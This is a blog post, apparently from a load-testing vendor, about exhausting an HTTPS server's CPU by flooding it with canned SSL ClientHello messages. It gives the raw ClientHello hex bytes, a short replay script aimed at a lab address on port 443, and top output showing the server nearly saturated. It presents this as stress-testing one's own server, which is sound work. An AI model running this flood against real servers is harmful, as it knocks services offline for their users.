Recently I met my friend Percy, who is a technical guru I respect. Our talk inevitably moved on to something technical on SSL - how many SSL handshakes can a server support. He sent me an interesting security threat report of DDoS on HTTPS servers.
This report indicates that HTTPS servers may suffer from the SSL re-negoation attacks thanks to the THC tool. Even if the re-negotiation is turned off, the server side still consumes a lot more CPU cycles than the client side due to the design of the SSL protocol. So it remains an attack vector.
To get an idea on how bad the server CPU exhaustion can be, I started wireshark, the world's most famous packet capture tool, to monitor the timing of the SSL handshake process. SSL handshake involves multiple steps, first step is that client side sends a client-hello message to the server side. According to the wireshark, just replying to a client-hello message causes server to do 5ms' worth of intensive computation (my server has an AMD quad-core CPU: Athlon II X4 645, 3.1 GHz).
Our NetGend platform can setup tens of thousands of concurrent SSL sessions from one box, but based on the analysis above, the best way to DDoS a server is to do as little as possible on the client side and yet cause the server to be busy. Some SSL handshaking steps may still cause the client side to do some nontrivial computations, so it's better to send a canned client-hello message which causes the client almost no computing time.
First we grab the hex representation of the bytes for a client-hello message from a pcap file and put them in a file called "clientHello.txt".
16 03 01 00 cc 01 00 00 c8 03 01 52 a2 93
34 0b 60 fd c9 59 ba 0c 8a 38 cc c7 b4 96 fa 50
09 cc 46 f2 40 2b e1 12 e7 99 3e 98 25 00 00 5a
c0 14 c0 0a 00 39 00 38 00 88 00 87 c0 0f c0 05
00 35 00 84 c0 12 c0 08 00 16 00 13 c0 0d c0 03
00 0a c0 13 c0 09 00 33 00 32 00 9a 00 99 00 45
00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07
c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14
00 11 00 08 00 06 00 03 00 ff 02 01 00 00 44 00
0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 01 00
02 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00
0a 00 0b 00 0c 00 0d 00 0e 00 0f 00 10 00 11 00
12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00
23 00 00
Then we create the following script to run on the NetGend platform.
function userInit() {
var data = readFile("clientHello.txt");
data = fromHexString(data); //this will convert hex bytes to binary data
}
function VUSER() {
connect("10.3.0.3", 443);
send(data);
recv(msg);
//close() is unnecessary, the connection will be closed at the end of VUser.
}
The script looks quite simple and runs on a slower PC (CPU clock speed is 2.53 GHz) but when it sends the client-hello messages at a rate about 2900/second (over multiple connections), the server side is almost completely busy (see the highlighted CPU idle percentage).
Tasks: 265 total, 2 running, 260 sleeping, 0 stopped, 3 zombie
Cpu(s): 81.8%us, 15.0%sy, 0.0%ni, 0.3%id, 0.0%wa, 0.0%hi, 2.8%si, 0.0%st
Mem: 16177816k total, 14040884k used, 2136932k free, 524640k buffers
Swap: 3929084k total, 0k used, 3929084k free, 9915940k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
18152 www-data 20 0 1961m 4008 1248 S 61 0.0 6:28.21 /usr/sbin/apache2 -k start
18462 www-data 20 0 1961m 4012 1248 S 61 0.0 0:41.27 /usr/sbin/apache2 -k start
18578 www-data 20 0 1961m 3984 1136 S 60 0.0 0:06.15 /usr/sbin/apache2 -k start
18151 www-data 20 0 1961m 4008 1248 S 59 0.0 6:26.73 /usr/sbin/apache2 -k start
18354 www-data 20 0 1961m 4644 1592 S 59 0.0 4:10.70 /usr/sbin/apache2 -k start
18490 www-data 20 0 1961m 3964 1104 S 59 0.0 0:40.16 /usr/sbin/apache2 -k start
17227 admin 20 0 3470m 2.2g 2.2g S 32 14.1 18:15.93 /usr/lib/vmware/bin/vmware-vmx -ssnapshot.num
So, it's good to be aware of a possible security threat, it's even better to get some idea on how bad it can be - the peace of mind matters. NetGend can give you that peace of mind.
No comments:
Post a Comment